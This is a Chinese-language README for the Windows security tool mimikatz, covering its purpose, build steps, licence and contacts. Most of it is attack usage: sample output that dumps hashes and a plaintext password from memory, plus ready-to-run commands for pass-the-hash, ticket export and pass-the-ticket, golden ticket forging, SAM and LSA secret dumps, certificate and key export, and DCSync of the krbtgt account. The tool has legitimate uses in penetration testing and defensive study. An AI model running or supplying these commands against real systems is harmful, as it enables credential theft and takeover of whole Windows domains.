一个用于探索 Windows 安全的小工具
mimikatz 是我为了学习 C 语言并对 Windows 安全进行一些实验而制作的一款工具。
如今它以从内存中提取明文密码、哈希、PIN 码和 Kerberos 票据而闻名。mimikatz 还可以执行哈希传递(pass-the-hash)、票据传递(pass-the-ticket)或构建_黄金票据(Golden tickets)_。
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
但这还不是全部!Crypto、终端服务器(Terminal Server)、事件(Events)……GitHub Wiki 上有大量信息:https://github.com/gentilkiwi/mimikatz/wiki 或 https://blog.gentilkiwi.com(法文,_是的_)。
如果你不想自行编译,可以从 https://github.com/gentilkiwi/mimikatz/releases 获取二进制文件。
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz 以 Visual Studio 解决方案和 WinDDK 驱动程序(主要操作可选)的形式提供,因此先决条件为:
mimikatz 和 mimilib:Visual Studio 2010、2012 或 2013 桌面版(2013 Express for Desktop 免费且支持 x86 与 x64 - http://www.microsoft.com/download/details.aspx?id=44914)mimikatz 驱动、mimilove(以及 ddk2003 平台):Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz 使用 SVN 进行源代码管理,但现在也支持 GIT!
你可以使用任何工具进行同步,甚至可以集成 GIT 到 Visual Studio 2013 中。
构建 / 生成解决方案(你可以更改体系结构)mimikatz 现在已编译完成,可以使用了!(Win32 / x64,甚至如果幸运的话也可以 ARM64)
_build_.cmd 和 mimidrv 的错误 MSB3073,这是因为没有 Windows Driver Kit 7.1 (WinDDK) 无法编译驱动程序,但 mimikatz 和 mimilib 可以正常使用。通过这个可选的 MSBuild 平台,你可以使用 WinDDK 构建工具以及默认的 msvcrt 运行时(二进制文件更小,无依赖关系)。
对于这个可选平台,Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 和 Visual Studio 2010 是必需的,即使你打算之后使用 Visual Studio 2012 或 2013。
请遵循以下说明:
mimikatz 项目已托管在 AppVeyor 上 - https://ci.appveyor.com/project/gentilkiwi/mimikatz
其状态为:
CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/
mimikatz 需要咖啡来继续开发:
gentilkiwi,你可以通过 Twitter ( @gentilkiwi ) 或邮件 ( benjamin [at] gentilkiwi.com ) 联系我lsadump 模块中的 DCSync 和 DCShadow 功能是与 Vincent LE TOUX 共同编写的,你可以通过邮件 ( vincent.letoux [at] gmail.com ) 联系他,或访问他的网站 ( http://www.mysmartlogon.com )这是一项个人开发项目,请尊重其理念,不要将其用于不良用途!